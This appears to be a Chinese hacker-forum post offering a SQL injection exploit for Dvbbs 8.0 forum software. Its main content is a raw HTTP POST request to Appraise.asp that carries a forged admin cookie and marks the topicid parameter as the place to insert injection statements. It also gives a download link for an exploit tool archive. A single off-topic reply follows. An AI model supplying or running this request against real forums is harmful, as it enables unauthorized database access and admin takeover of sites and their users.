动网8.0sql最新注入漏洞+利用工具
动网8.0sql最新注入漏洞+利用工具<BR>POST /Appraise.asp?action=save HTTP/1.1 <BR>Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* <BR>Referer: <A href="http://bbs.xxx.com.../" target=_blank>http://bbs.xxx.com...</A> eplyID=5&skin=1 <BR>Accept-Language: zh-cn <BR>Content-Type: application/x-www-form-urlencoded <BR>Accept-Encoding: gzip, deflate <BR>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) <BR>Host: bbs.xxx.com<BR>Content-Length: 163 <BR>Connection: Keep-Alive <BR>Cache-Control: no-cache <BR>Cookie: DvForum=userid=1&usercookies=0&userclass=%B9%DC%C0%ED%D4%B1&username=admin&userhidden=2&password=r84y6115O3q4tPFJ&StatUserID=4419358; w0802=21; rtime=0; ltime=1183993930108; w08_eid=70836889-http%3A//bbs.xxx.com/index.asp%3Fboardid%3D2; ASPSESSI; upNum=0; geturl=%2Fdispbbs%2Easp%3Fboardid%3D2%26ID%3D2%26replyID%3D2%26skin%3D1; Dvbbs=ciffahcie <BR>boardid=2&announceid=5&atype=0&a1=0&a2=0&atitle=thenines&acodestr=3361&ac&topicid=41(这里就加sql注入语句啦)<BR><BR>别忘记修改Content-Length<BR><BR><BR>注:工具下载地址<A href="http://www.hackerspirit.com/attachments/month_0708/72007815131341.rar" target=_blank target=_blank>http://www.hackerspirit.com/attachments/month_0708/72007815131341.rar</A><BR><BR>re:动网8.0sql最新注入漏洞+利用工具
好象是qq等级修改器,没用的,只有本机才能看见。腾讯服务器要是也能改就好了,呵呵。。
页:
[1]